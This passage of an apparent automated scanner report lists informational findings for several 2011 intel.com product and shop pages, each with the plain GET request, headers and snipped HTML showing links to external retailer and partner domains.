Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:26 GMT
Content-Length: 28041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.135. http://www.intel.com/products/laptop/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /products/laptop/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/products/laptop/index.htm?iid=gg_prod-en_US+laptop
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /products/laptop/index.htm?iid=gg_prod-en_US+laptop HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:25 GMT
Content-Length: 27531
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.136. http://www.intel.com/products/motherboard/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /products/motherboard/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/products/motherboard/index.htm?iid=gg_prod-en_US+mb
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.intelbettertogether.com/

Request

GET /products/motherboard/index.htm?iid=gg_prod-en_US+mb HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:25 GMT
Content-Length: 29230
Connection: close

<!DOCTYPE html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<!-- DOC-FACTORY Generated Tags BEGIN -->
<title>Motherboards from
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li><a href="http://www.intelbettertogether.com/"><strong>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.137. http://www.intel.com/products/processor/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /products/processor/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/products/processor/index.htm?iid=gg_prod-en_US+procs
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /products/processor/index.htm?iid=gg_prod-en_US+procs HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.138. http://www.intel.com/reseller/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /reseller/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/reseller/index.htm?iid=subhdr+ptr_chan_reseller
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /reseller/index.htm?iid=subhdr+ptr_chan_reseller HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:58 GMT
Content-Length: 29032
Connection: close

<HTML>
<HEAD>
<!-- DOC-FACTORY Generated Tags BEGIN -->
<TITLE>Intel&#174; Reseller Center Region Selector</TITLE>
<meta name = "creation_date" content = "22-Jun-07">
<meta name = "stop_date" con
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.139. http://www.intel.com/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /shop

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/shop?iid=gg_prod-en_US+cons_shop
The response contains the following links to other domains:
  • http://bestbuy.com/intelwidi
  • http://intelfeed.ihvweb6.com/images/7_B0034FSVRW.jpg
  • http://mobility.mirusinnovations.com/images/products/136776_590x442.png
  • http://www.appup.com/
  • http://www.cyberpowerpc.com/images/cs/xdreamer3/blk_sf4_150.jpg
  • http://www.ibuypower.com/Images/Components/3489/LW2-1.png
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.wireless.att.com/cell-phone-service/cell-phone-details/?q_sku=sku4940349

Request

GET /shop?iid=gg_prod-en_US+cons_shop HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:20:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=jQqtNNbNTmjhlWb9JmYNf38R1LKMJlP6tfzhjJGvPDXGHy8G4vD2!1651646670; path=/; HttpOnly=
Content-Length: 39887


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="shop-promo1" class="main-shop-lhc-module" style="margin: -7px 0px 5px -6px;"><a href="http://Bestbuy.com/intelwidi" target="_blank"><img src="http://www.intel.com/en_US/Assets/Image/backgrounds/shop_promo_main_mod.png">
...[SNIP]...
<a class="product_image" href="/shop/laptop/61253"><img src="http://intelfeed.ihvweb6.com/images/7_B0034FSVRW.jpg" height="95" width="95" alt="Toshiba A11"/></a>
...[SNIP]...
<a class="product_image" href="/shop/desktop/6744"><img src="http://www.ibuypower.com/Images/Components/3489/LW2-1.png" height="95" width="95" alt="iBUYPOWER LAN Warrior II"/></a>
...[SNIP]...
<a class="product_image" href="/shop/desktop/6803"><img src="http://www.cyberpowerpc.com/images/cs/xdreamer3/blk_sf4_150.jpg" height="95" width="95" alt="CyberPower Xtreme 2000"/></a>
...[SNIP]...
<a class="product_image" href="/shop/netbook/6838"><img src="http://mobility.mirusinnovations.com/images/products/136776_590x442.png" height="95" width="95" alt="Mirus Schoolmate Clamshell 10&#034; MIRCM10GXP"/></a>
...[SNIP]...
<li><a href="http://www.appup.com/" title="AppUp Center">Visit Intel AppUp<sup>
...[SNIP]...
<p><a href="http://www.wireless.att.com/cell-phone-service/cell-phone-details/?q_sku=sku4940349#fbid=29bif7BLCVX?source=ECNBIN0001000000A" target="_blank" title="Get details">Get details &gt;</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.140. http://www.intel.com/shop/desktops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /shop/desktops

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/shop/desktops?iid=subhdr+shop_desktop
The response contains the following links to other domains:
  • http://www.cyberpowerpc.com/images/cs/ap970/01_150.jpg
  • http://www.cyberpowerpc.com/images/cs/blackstorm/wht_150.jpg
  • http://www.cyberpowerpc.com/images/cs/blade/01_150.jpg
  • http://www.cyberpowerpc.com/images/cs/cmstorm/blk_150.jpg
  • http://www.cyberpowerpc.com/images/cs/haf912/blk_150.jpg
  • http://www.cyberpowerpc.com/images/cs/solano/01_150.jpg
  • http://www.cyberpowerpc.com/images/cs/xdreamer3/blk_sf4_150.jpg
  • http://www.cyberpowerpc.com/system/Gamer_Infinity_8800_Pro/
  • http://www.cyberpowerpc.com/system/Gamer_Infinity_Killer_8000/
  • http://www.cyberpowerpc.com/system/Gamer_Xtreme_1000/
  • http://www.cyberpowerpc.com/system/Gamer_Xtreme_2000/
  • http://www.cyberpowerpc.com/system/Gamer_Xtreme_3000/
  • http://www.cyberpowerpc.com/system/Gamer_Xtreme_5000/
  • http://www.cyberpowerpc.com/system/Gamer_Xtreme_5200/
  • http://www.cyberpowerpc.com/system/Gamer_Xtreme_6000/
  • http://www.cyberpowerpc.com/system/Gamer_Xtreme_SSD-T/
  • http://www.cyberpowerpc.com/system/Rattler/
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /shop/desktops?iid=subhdr+shop_desktop HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:21:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=ZDpJNNbb4GjTQpTRCyZYTNnWT8nZ2TJPNGpDLSBxZqXJv2TqGrbP!-824261870; path=/; HttpOnly=
Content-Length: 748617


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_1000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Gamer Xtreme 1000&prc=599.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/blade/01_150.jpg" alt="CyberPower Gamer Xtreme 1000 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_1000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Gamer Xtreme 1000&prc=599.00" target="_blank"> CyberPower Gamer Xtreme 1000</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_1000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Gamer Xtreme 1000&prc=599.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_2000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Xtreme 2000&prc=839.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/xdreamer3/blk_sf4_150.jpg" alt="CyberPower Xtreme 2000 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_2000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Xtreme 2000&prc=839.00" target="_blank"> CyberPower Xtreme 2000</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_2000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Xtreme 2000&prc=839.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_SSD-T/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Xtreme SSD&prc=879.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/blade/01_150.jpg" alt="CyberPower Xtreme SSD image" width="120" border="0" /></a>
...[SNIP]...
